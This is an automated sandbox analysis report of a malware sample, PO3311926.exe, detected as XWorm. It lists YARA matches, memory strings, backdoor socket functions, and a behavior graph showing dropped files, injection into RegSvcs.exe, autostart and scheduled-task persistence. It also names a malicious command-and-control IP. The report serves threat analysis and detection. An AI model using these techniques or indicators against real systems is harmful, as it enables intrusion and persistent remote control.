Source: Yara match File source: 00000015.00000002.1714503367.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2166138425.00000000041ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2160342151.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1702942543.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1703000356.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1565515689.0000000004098000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1693784199.0000000000E7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1916546017.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1906750023.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1702531700.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2165918664.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1693739321.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1565342745.00000000017AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1916582807.0000000001665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1906792983.000000000167B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1702562774.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2165964691.0000000001814000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin PID: 3232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin.exe PID: 6064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5308, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5924, type: MEMORYSTR
OS version to string mapping found (often used in BOTs)
Source: sdadbtvsh.bin.exe Binary or memory string: WIN_81
Source: sdadbtvsh.bin.exe Binary or memory string: WIN_XP
Source: sdadbtvsh.bin.8.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: sdadbtvsh.bin.exe Binary or memory string: WIN_XPe
Source: sdadbtvsh.bin.exe Binary or memory string: WIN_VISTA
Source: sdadbtvsh.bin.exe Binary or memory string: WIN_7
Source: sdadbtvsh.bin.exe Binary or memory string: WIN_8

Remote Access Functionality
barindex
Yara detected XWorm
Source: Yara match File source: 21.2.RegSvcs.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.3.sdadbtvsh.bin.exe.e6f650.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.sdadbtvsh.bin.exe.181df28.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.sdadbtvsh.bin.17b6130.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.sdadbtvsh.bin.exe.166ebd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.2166043970.0000000001832000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2160394335.000000000182A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1557524427.00000000017C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1916712063.0000000004046000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1916641917.0000000001682000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1565296596.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1557460063.00000000017FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.1714503367.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2166138425.00000000041ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2160342151.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1702942543.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1703000356.00000000037D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1565515689.0000000004098000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1693784199.0000000000E7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1916546017.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1906750023.00000000016B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1702531700.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2165918664.0000000001866000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1693739321.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1565342745.00000000017AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1916582807.0000000001665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.1906792983.000000000167B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.1702562774.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.2165964691.0000000001814000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin PID: 3232, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin.exe PID: 6064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 1036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5308, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5924, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00612163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 8_2_00612163
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin Code function: 8_2_00611B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 8_2_00611B61
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AE2163 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 20_2_00AE2163
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe Code function: 20_2_00AE1B61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 20_2_00AE1B61
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1433216 Sample: PO3311926.exe Startdate: 29/04/2024 Architecture: WINDOWS Score: 100 92 Found malware configuration 2->92 94 Multi AV Scanner detection for dropped file 2->94 96 Multi AV Scanner detection for submitted file 2->96 98 12 other signatures 2->98 11 PO3311926.exe 3 28 2->11         started        15 sdadbtvsh.bin.exe 1 2->15         started        17 sdadbtvsh.bin.exe 2->17         started        19 7 other processes 2->19 process3 dnsIp4 68 C:\Users\user\AppData\Local\...\sdadbtvsh.bin, PE32 11->68 dropped 70 C:\Users\user\AppData\Local\Temp\...\vjpj.vbe, Unicode 11->70 dropped 72 C:\Users\user\AppData\Local\...\nngqrvwq.xl, data 11->72 dropped 104 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->104 22 wscript.exe 1 11->22         started        106 Multi AV Scanner detection for dropped file 15->106 108 Found API chain indicative of sandbox detection 15->108 110 Creates multiple autostart registry keys 15->110 25 RegSvcs.exe 15->25         started        112 Writes to foreign memory regions 17->112 114 Allocates memory in foreign processes 17->114 116 Injects a PE file into a foreign processes 17->116 27 RegSvcs.exe 17->27         started        84 192.168.2.8, 138, 443, 49251 unknown unknown 19->84 86 239.255.255.250 unknown Reserved 19->86 29 chrome.exe 19->29         started        32 conhost.exe 19->32         started        34 conhost.exe 19->34         started        36 4 other processes 19->36 file5 signatures6 process7 dnsIp8 100 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->100 38 cmd.exe 1 22->38         started        40 cmd.exe 1 22->40         started        43 cmd.exe 1 22->43         started        90 www.google.com 142.250.191.196, 443, 49712, 49713 GOOGLEUS United States 29->90 signatures9 process10 signatures11 45 sdadbtvsh.bin 1 25 38->45         started        49 conhost.exe 38->49         started        102 Uses ipconfig to lookup or modify the Windows network settings 40->102 51 conhost.exe 40->51         started        53 ipconfig.exe 1 40->53         started        55 conhost.exe 43->55         started        57 ipconfig.exe 1 43->57         started        process12 file13 76 C:\Users\user\wrse\sdadbtvsh.bin.exe, PE32 45->76 dropped 78 C:\Users\user\wrse\sdadbtvsh.bin, PE32 45->78 dropped 80 C:\Users\user\AppData\...\sdadbtvsh.bin.exe, PE32 45->80 dropped 82 C:\Users\user\wrse\nngqrvwq.xl, data 45->82 dropped 122 Multi AV Scanner detection for dropped file 45->122 124 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 45->124 126 Writes to foreign memory regions 45->126 128 2 other signatures 45->128 59 RegSvcs.exe 1 4 45->59         started        signatures14 process15 dnsIp16 88 102.165.14.26, 5007 ASDETUKhttpwwwheficedcomGB South Africa 59->88 74 C:\Users\user\AppData\Roaming\RegSvcs.exe, PE32 59->74 dropped 118 Creates multiple autostart registry keys 59->118 120 Uses schtasks.exe or at.exe to add and modify task schedules 59->120 64 schtasks.exe 1 59->64         started        file17 signatures18 process19 process20 66 conhost.exe 64->66         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
239.255.255.250
 unknown Reserved
unknown unknown false
102.165.14.26
 unknown South Africa
61317 ASDETUKhttpwwwheficedcomGB true
142.250.191.196
 www.google.com United States
15169 GOOGLEUS false

Private

IP
192.168.2.8

Contacted Domains

Name IP Active
www.google.com 142.250.191.196 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://www.google.com/async/ddljson?async=ntp:2 false
    		high
    https://www.google.com/async/newtab_promos false
      		high
      https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRRtT5aGKXUvbEGIjD-kgWdpW8hT-9hc2nj_b9H1bs6sOSvG1viHx2oR-H037B_HudVAHyts9ARK3nBSXsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
        		high
        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
          		high
          https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
            		high
            https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRRtT5aGKXUvbEGIjDdp0aB_5C1gr2eixUtAMj4mBUQzkJ9vh0Q2d77njF6aqNILXZ84lvrwl1-Gwx1dfsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
              		high
              102.165.14.26 true
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              		 unknown